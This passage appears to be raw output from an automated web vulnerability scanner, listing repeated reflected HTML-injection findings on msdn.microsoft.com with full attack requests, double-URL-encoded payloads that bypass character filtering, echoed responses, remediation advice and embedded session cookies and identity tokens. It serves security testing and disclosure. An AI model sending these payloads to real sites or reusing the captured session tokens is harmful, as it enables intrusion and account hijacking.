Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6921d"><a>979c28d57ca/dd582940(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a8e%2522%253e%253ca%253edc8afda3d17 was submitted in the REST URL parameter 3. This input was echoed as 54a8e"><a>dc8afda3d17 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582940(office.1154a8e%2522%253e%253ca%253edc8afda3d17 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.1154a8e"><a>dc8afda3d17" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18002%2522%253e%253ca%253e6324386485a was submitted in the REST URL parameter 1. This input was echoed as 18002"><a>6324386485a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:53 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us18002"><a>6324386485a/library/dd582940(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36af%2522%253e%253ca%253e86108dcf880 was submitted in the REST URL parameter 2. This input was echoed as c36af"><a>86108dcf880 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:24 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc36af"><a>86108dcf880/dd582940(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93bc5%2522%253e%253ca%253e7a158e741b3 was submitted in the REST URL parameter 3. This input was echoed as 93bc5"><a>7a158e741b3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:54 GMT
Content-Length: 9206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.11).aspx93bc5"><a>7a158e741b3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b717%2522%253e%253ca%253e026167f029 was submitted in the REST URL parameter 1. This input was echoed as 3b717"><a>026167f029 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us3b717%2522%253e%253ca%253e026167f029/library/default(loband).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3b717"><a>026167f029/library/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a550a%2522%253e%253ca%253eae5fa62af7a was submitted in the REST URL parameter 2. This input was echoed as a550a"><a>ae5fa62af7a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya550a%2522%253e%253ca%253eae5fa62af7a/default(loband).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya550a"><a>ae5fa62af7a/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270%2522%253e%253ca%253e1e436389099 was submitted in the REST URL parameter 3. This input was echoed as 8b270"><a>1e436389099 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/default(loband).aspx8b270%2522%253e%253ca%253e1e436389099 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/default(loband).aspx8b270"><a>1e436389099" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0fb%2522%253e%253ca%253e210aa7e2390 was submitted in the REST URL parameter 1. This input was echoed as ce0fb"><a>210aa7e2390 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usce0fb%2522%253e%253ca%253e210aa7e2390/library/ee663300(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
